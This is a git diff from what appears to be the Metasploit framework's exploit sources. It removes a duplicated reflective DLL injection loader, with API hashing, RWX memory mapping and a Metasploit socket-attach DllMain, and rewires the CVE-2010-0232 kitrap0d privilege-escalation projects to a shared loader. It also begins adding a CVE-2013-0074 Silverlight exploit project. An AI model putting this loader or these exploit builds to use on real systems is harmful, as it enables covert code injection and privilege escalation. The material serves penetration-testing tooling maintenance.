uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA - && pGetProcAddress - && pVirtualAlloc -#ifdef ENABLE_STOPPAGING - && pVirtualLock -#endif - && pNtFlushInstructionCache -#ifdef ENABLE_OUTPUTDEBUGSTRING - && pOutputDebug -#endif - ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - -#ifdef ENABLE_STOPPAGING - // prevent our image from being swapped to the pagefile - pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); -#endif - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume there is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // iterate through all imports until a null RVA is found (Characteristics is mis-named) - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics ) - { - OUTPUTDBG("Loading library: "); - OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); - OUTPUTDBG("\n"); - - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - if ( !uiLibraryAddress ) - { - OUTPUTDBG("Loading library FAILED\n"); - - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - continue; - } - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - OUTPUTDBG("Resolving function: "); - OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); - OUTPUTDBG("\n"); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - OUTPUTDBG("Flushing the instruction cache"); - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h deleted file mode 100644 index 26c195b2fc..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h +++ /dev/null @@ -1,223 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -// Enable this define to turn on OutputDebugString support -//#define ENABLE_OUTPUTDEBUGSTRING 1 - -// Enable this define to turn on locking of memory to prevent paging -#define ENABLE_STOPPAGING 1 - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); -typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define NTDLLDLL_HASH 0x3CFA685D - -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 -#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 - -#ifdef ENABLE_STOPPAGING -typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T ); -#define VIRTUALLOCK_HASH 0x0EF632F2 -#endif - -#ifdef ENABLE_OUTPUTDEBUGSTRING -typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR ); -#define OUTPUTDEBUG_HASH 0x470D22BC -#endif - -#define IMAGE_REL_BASED_ARM_MOV32A 5 -#define IMAGE_REL_BASED_ARM_MOV32T 7 - -#define ARM_MOV_MASK (DWORD)(0xFBF08000) -#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) -#define ARM_MOVW 0xF2400000 -#define ARM_MOVT 0xF2C00000 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - -__forceinline DWORD _hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c index 0e1600ee74..de50313c19 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c @@ -10,11 +10,11 @@ */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "../common/common.h" -#include "../common/LoadLibraryR.h" +#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../common/ResourceLoader.h" #include "resource.h" diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj index 8b82cd553c..8bc56a0824 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -81,7 +81,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded @@ -121,17 +121,21 @@ /ignore:4070 - editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\" - + + - diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters index 3c522c527e..9aea3a8408 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters @@ -2,24 +2,24 @@ - - common - common + + RDI + common - - common - common + + RDI + @@ -28,5 +28,8 @@ {cbb362dd-4029-4348-86d3-62c4b22c742d} + + {662e77af-b8cd-4717-a3f2-87b2ec57f46c} + \ No newline at end of file diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj index 32875e0cb3..41cb73ff96 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -75,7 +75,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c index 7bc93fcb93..bacbb7b87f 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c @@ -7,7 +7,7 @@ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "kitrap0d.h" diff --git a/external/source/exploits/CVE-2010-0232/make.msbuild b/external/source/exploits/CVE-2010-0232/make.msbuild new file mode 100755 index 0000000000..a44980b045 --- /dev/null +++ b/external/source/exploits/CVE-2010-0232/make.msbuild @@ -0,0 +1,18 @@ + + + + .\kitrap0d.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-0074/.gitignore b/external/source/exploits/cve-2013-0074/.gitignore new file mode 100755 index 0000000000..653f65a11e --- /dev/null +++ b/external/source/exploits/cve-2013-0074/.gitignore @@ -0,0 +1,12 @@ +SilverApp1/Release/ +SilverApp1/Debug/ +SilverApp1/Bin/Release/ +SilverApp1/Bin/Debug/ +SilverApp1/obj/Release/ +SilverApp1/obj/Debug/ +SilverApp1/SilverApp1.csproj.user +SilverApp1.ncb +SilverApp1.suo +SilverApp1.sdf +SilverApp1.opensdf +SilverApp1.v11.suo diff --git a/external/source/exploits/cve-2013-0074/README b/external/source/exploits/cve-2013-0074/README new file mode 100644 index 0000000000..daeec3271c --- /dev/null +++ b/external/source/exploits/cve-2013-0074/README @@ -0,0 +1,14 @@ +Original Exploit by Vitaliy Toropov + +See Packet Storm Advisory 2013-1022-1 +http://packetstormsecurity.com/files/123732/PSA-2013-1022-1.txt + +Source code just modified to add a new Silverlight 5 target and tweak it to allow dynamic payloads, not +just the hardcoded one. + +In order to put an environment ready: + +- Install Visual Studio 2010 +- Install Visual Studio 2010 SP1 +- Install Silverlight 5 tools for Visual Studio 2010. (http://www.microsoft.com/en-us/download/details.aspx?id=28358) +- Install the Silverlight5 Developer version (SDK) needed for testing. \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0074/SilverApp1.sln b/external/source/exploits/cve-2013-0074/SilverApp1.sln new file mode 100755 index 0000000000..79680f0e2b --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual Studio 2010 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SilverApp1", "SilverApp1\SilverApp1.csproj", "{D33B3660-E6CA-4B29-9E09-0DF99B28840E}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.Build.0 = Debug|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.ActiveCfg = Release|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml new file mode 100755 index 0000000000..8c7b18d4b2 --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml @@ -0,0 +1,8 @@ + + + + + diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs 